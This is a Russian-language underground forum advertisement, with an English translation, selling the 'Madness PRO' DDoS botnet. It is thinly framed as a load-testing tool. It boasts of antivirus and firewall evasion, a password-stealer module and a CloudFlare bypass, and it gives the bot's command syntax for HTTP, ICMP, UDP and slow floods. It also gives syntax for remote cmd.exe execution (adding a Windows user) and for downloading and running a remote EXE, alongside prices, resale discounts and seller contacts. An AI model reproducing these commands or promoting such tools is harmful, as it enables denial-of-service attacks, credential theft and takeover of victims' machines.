Madness PRO Stresser verion 2
Дата релиза: 01.09.2013
История создания:
Летом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования собственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не заслужила даже оценки "4".
Тестируемые семплы во время работы пожирали память, загружали процессор локальной машины, вылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали срабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.
Для создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг), DirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код, приобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих околотемных программ.
Возможности
- написан на C++, легко криптуется, имеет малый вес (сжатый семпл < 15кб)
- полная совместимость со всеми Windows семейства NT (x86 и x64)
- Бот имеет 7 типов атак
- стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.
- Не привлекает внимание UAC и Windows Firewall
- умеет устанавливать port, referal и cookies индивидуально для каждой цели
- поддерживает до 10-ти целей одновременно
- имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех аналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней работой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые параметры: адрес, порт, реферал и т.д.)
- имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет прямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании WinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому показателю) конкурентов.
- в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.
- поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.
- поддерживает Slow GET и Slow POST режимы!
- в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на сервер.
- защита диалога бот-панель спецключем
Модули:
- PassGrabber (стилер): модуль находит и выгружает на сервер пароли от 26-ти программ(на октябрь 2014-го года).
цена $55 для базовой лицензии, $100 для лайт лицензии, бесплатно для полной.
Детектирование:
при проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA, ClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили файл в 100% случаев.
линк на результат: http://virusscan.jotti.org/ru/scanresult/1addb09c12301f5a246271adf835e3a6f4208d8c
Режимы атаки и команды
Так как система является профессиональной синтаксис комманд давольно сложен, но только на первый взгляд =) Синтаксис команд обратносовместим с системой Darkness.
dd1 Основной режим работы по HTTP протоколу методом GET, используя соккеты. Поддерживает ***cookies и $$$ref и допускает до 10 целей одновременно (разделитель ";"). Самая быстрая по количеству запросов атака. Пример: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2
dd2 Тот же режим, что и dd1, только метод POST. Добавляется обязательный параметр @@@post_data. Так же поддерживается до 10-ти целей. Пример: dd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy&password=hhh, эта команда запостит логин yyy и пароль hhh на скрипт http://forum.ru/index.php
dd3 атака по HTTP методом GET используя системную библиотеку WinInet.dll. Старая-добрая атака, используемая в многих Delphi ботах. Медленная из-за ограничений десктопных Windows. Не поддерживает реферал и куки, поддерживает до 10 целей. Пример: dd3=http://host.com/script.php
dd4 атака по HTTP методом POST используя системную библиотеку WinInet. То же что и dd3, только POST. Пример:
dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh
dd5 ICMP атака (пинги). Поддерживается до 10 целей. Пример dd5=198.168.0.1;199.0.0.1
dd6 UDP атака. Поддерживается до 10 целей. Обязательные параметры: порт и текст. Пример: dd6=192.168.0.2:27015@@@flud_text
dd7 атака по HTTP методом GET используя системную библиотеку URMON.dll Средняя по скорости атака, поддерживает до 10 целей и не поддерживает cookies и referal
cfa команда обхода защиты CloudFlare (!). Используется ТОЛЬКО во время работы dd7. Не оставнавливает выполнение команды dd7. Суть проста - бот выполняет ява скрипт, получает нужную cookie и CloudFlare считает запросы сделанные dd7 авторизованными. Пример: dd7=http://site.ru/index.php, затем (через полторы минуты) cfa=http://site.ru/index.php
cmd команда выполняется в коммандном интерпритаторе cmd.exe на локальной машине. Не останавливает выполнение других команд. Пример: cmd=net user goodwin /add
exe команда на загрузку и выполнение EXE файла. Не останавливает выполнение других команд. Файл сохраняется под тем же именем, под которым он был в интернете. Производится 3 попытки скачать файл. Пример: exe=http://site.com/filename.exe
Панель управления:
Мы использовали измененную на ~70% ПУ от другого комплекса (приобретенную по договору на изменение и перепродажу), переписав ее практически полностью, так как было обнаружено слишком много ошибок и код не понравился. Естественно все было исправлено и оптимизировано - новая ПУ Вам понравится!
Скриншоты:
:screenshot: Скриншот|Screenshot
:screenshot: Скриншот|Screenshot
Демонстрация:
Так-как система очень мощная и для демонстрации возможностей нужно всего 15-20 ботов, которые всегда в наличии - селлеры постараются продемонстрировать мощность.
Цены:
- тестовая лицензия $0 (только для проверяющих на форумах и тестеров. обновления не предусмотрены)
- лайт лицензия $250 (обновление/ребилд $75 обновление на новую версию $100)
- базовая лицензия $350 (обновление/ребилд $35, обновление на новую версию $100)
- полная лицензия $550 (все обновления, ребилды и модули бесплатны)
Скидки:
- 30% для владельцев GBot/Dirt Dumper, базовой лицензии iBot, базовой/серебряной лицензии Darkness
- 50% для владельцев золотой и бриллиантовой лицензии Darkness/iBot
- 20% дополнительно для тех, кто приобретал указанные выше продукты не более недели назад.
Оплата
к оплате принимаются ЯД, WMR/WMZ/WMB, PM и LR. А так же любая валюта через обменник.
Гарантии:
Готовность работать через гаранта любого, известного форума.
Рассрочка
Для имеющих репутацию и/или аттестаты людей предусмотрена система рассрочки. Обсуждается индивидуально. Кроме лайт лицензий.
Контакты
- селлер 1 ICQ: 902300 JAB: - (OTR)
- селлер 2 ICQ: 903400
- селлер 3 ICQ: 709750
Готов пройти проверку на условиях администрации форума.
English solution:
Release date: 01.09.2013
History:
Created in the summer of 2012 we started thinking about creating a fundamentally new DDoS bot-testing your own web resources on fault tolerance, and load.
Sample targets tested had memory crash, over loaded processor of local machines which start generating errors, freezing CPU at just 50% load. Created bad entries in the registry which triggers protective systems, many errors were found in the error logs.
When building this system, we studied in detail: BlackEnergy (source code), Gbot (disassembling), Dirtjumper (disassembling), Darkness Optima (source code, purchased under the contract), ibot (source code, purchased under the contract), w3bot (source)
Features
- Written in c + +, easily crypt is lightweight (compressed sample <15KB)
- Full compatibility with all windows family (x86 and x64)
- Bot has 7 types of attacks
- Extremely stable system. Load on CPU and ram is very powerful.
- does not attract attention to UAC Windows Firewall
- can install port, referal and cookies individually for each attack
- Supports up to 10 targets simultaneously
- has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads
- it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.)
- has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors.
- in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple.
- support and slow get slow post! mode
- indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.
- Bot protection of panel.
Modules:
- PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014).
price $50 for base licence, $100 for lite licence, free for full.
Detection:
Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases.
Attack modes and commands:
As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
• dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.ru cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2
• dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script
• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php
• dd4 attack http post method using the system library wininet. the same as dd3, only post. Example:
DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh
• dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1
• dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text
• dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
• cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa = http://site.ru/index.php
• cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
• exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe
Control Panel:
We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!
Demonstration:
how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.
Prices:
- Test License $0 (only for checking the forums and testers. updates not provided)
- Lite Licence $250 (update/rebuild $75, upgrade to the new version $ 100)
- Basic License $350 (Update / Rebuild $35 upgrade to the new version $ 100, the price of the modules will be installed later)
- full license $550 (all updates Rebuild and modules are free)
Discounts:
- 30% for owners Gbot / Andromeda / Dirt dumper, basic license ibot, base / silver license Darkness
- 50% for owners of gold and diamond license Darkness / ibot
- 20% extra for those who acquired the products listed above are not more than a week ago.
Payment
Accepted payment methods, WMR / WMZ / WMB, PM and BTC. as well as any currency through an currency exchanger.
Warranty:
Willing to work with the buyer to resolve any issues that may be encountered.
Contacts
- Seller 1 ICQ: 902300 JAB: -
- Seller 2 ICQ: 903400
- Seller 3 ICQ: 709750
Теги для гугла: бот, ддос, ддос бот, меднеес, меднесс бот, маднесс, маднесс бот, маднесс ддос, купить ддосер, маднесс купить, купить ддоса бота, купить ддос, Madness DdoS Bot, buy madness bot, Optima DDoS, DDoS Bot, Buy bot, лучший ддос бот, лучший DDoS бот, best DDoS bot, как заддосить, как сделать ддос, где заказати ддос, ддос услуги, как досить самому, программы для ддоса, сильнеший ддос бот, лучший ботнет, лучший троян, лучший ддос, купить троян, купить лоадер, купить кейлоггер, крутой бот, мегабот, где купить вирус, убить сайт, русская интернет армия, обход антиддос защит, положить сервер, убить игру, убить стрим, убить трансляцию, дудос, дудос сука, слоу ддос, slow ddos, обход UAC, UAC bypassyng, обход фаерволла, firewall bypassing
Отредактировано DamRai (2015-02-04 16:22:56)